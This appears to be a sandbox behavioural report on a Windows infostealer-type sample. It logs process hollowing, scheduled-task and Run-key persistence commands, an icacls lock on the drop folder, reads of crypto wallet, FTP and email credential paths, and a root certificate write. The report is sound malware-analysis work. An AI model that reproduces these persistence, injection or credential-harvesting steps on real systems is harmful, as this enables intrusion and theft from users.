RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"

Communicates with host for which no DNS query was performed (1 event)

host

116.203.7.73

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2132 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2416 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2932 region_size: 442368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000a8	1

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

reg_value

"C:\Users\test22\AppData\Local\229c02e7-7584-4177-8796-fc34841171d9\buildz.exe" --AutoStart

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets\

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Executes one or more WMI queries (2 events)

wmi
wmi	Select * From AntiVirusProductroot\SecurityCente

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory April 21, 2023, 5:57 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2132 process_handle: 0x00000080	1	1
WriteProcessMemory April 21, 2023, 5:57 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2416 process_handle: 0x00000080	1	1
WriteProcessMemory April 21, 2023, 5:57 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2932 process_handle: 0x000000a8	1	1

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA April 21, 2023, 5:57 p.m.	key_handle: 0x00000588 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (1 event)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (3 events)

process	buildz.exe	useragent	Microsoft Internet Explorer
process	build2.exe	useragent	Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
process	build2.exe	useragent	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2052 called NtSetContextThread to modify thread in remote process 2132
Process injection	Process 2336 called NtSetContextThread to modify thread in remote process 2416
Process injection	Process 2828 called NtSetContextThread to modify thread in remote process 2932
NtSetContextThread April 21, 2023, 5:57 p.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2132	1	0	0
NtSetContextThread April 21, 2023, 5:57 p.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2416	1	0	0
NtSetContextThread April 21, 2023, 5:57 p.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4381549 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000a4 process_identifier: 2932	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2052 resumed a thread in remote process 2132
Process injection	Process 2132 resumed a thread in remote process 2336
Process injection	Process 2336 resumed a thread in remote process 2416
Process injection	Process 2828 resumed a thread in remote process 2932
NtResumeThread April 21, 2023, 5:57 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2132	1	0	0
NtResumeThread April 21, 2023, 5:57 p.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2336	1	0	0
NtResumeThread April 21, 2023, 5:57 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2416	1	0	0
NtResumeThread April 21, 2023, 5:57 p.m.	thread_handle: 0x000000a4 suspend_count: 1 process_identifier: 2932	1	0	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

icacls "C:\Users\test22\AppData\Local\229c02e7-7584-4177-8796-fc34841171d9" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Executed a process and injected code into it, probably while unpacking (27 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 2136 thread_handle: 0x0000007c process_identifier: 2132 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\buildz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\buildz.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\buildz.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread April 21, 2023, 5:57 p.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection April 21, 2023, 5:57 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2132 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2132 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory April 21, 2023, 5:57 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2132 process_handle: 0x00000080	1	1
NtSetContextThread April 21, 2023, 5:57 p.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2132	1	0
NtResumeThread April 21, 2023, 5:57 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2132	1	0
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 2280 thread_handle: 0x00000300 process_identifier: 2276 current_directory: filepath: track: 1 command_line: icacls "C:\Users\test22\AppData\Local\229c02e7-7584-4177-8796-fc34841171d9" /deny *S-1-1-0:(OI)(CI)(DE,DC) filepath_r: stack_pivoted: 0 creation_flags: 72 (DETACHED_PROCESS\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000310	1	1
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 2340 thread_handle: 0x000002c0 process_identifier: 2336 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\buildz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\buildz.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\buildz.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c8	1	1
NtResumeThread April 21, 2023, 5:57 p.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2336	1	0
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 2420 thread_handle: 0x0000007c process_identifier: 2416 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\buildz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\buildz.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\buildz.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread April 21, 2023, 5:57 p.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection April 21, 2023, 5:57 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2416 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2416 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory April 21, 2023, 5:57 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2416 process_handle: 0x00000080	1	1
NtSetContextThread April 21, 2023, 5:57 p.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2416	1	0
NtResumeThread April 21, 2023, 5:57 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2416	1	0
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 2832 thread_handle: 0x000002c0 process_identifier: 2828 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe" filepath_r: C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b8	1	1
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 3008 thread_handle: 0x0000049c process_identifier: 3004 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build3.exe" filepath_r: C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004dc	1	1
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 2936 thread_handle: 0x000000a4 process_identifier: 2932 current_directory: filepath: C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe" filepath_r: C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000a8	1	1
NtGetContextThread April 21, 2023, 5:57 p.m.	thread_handle: 0x000000a4	1	0
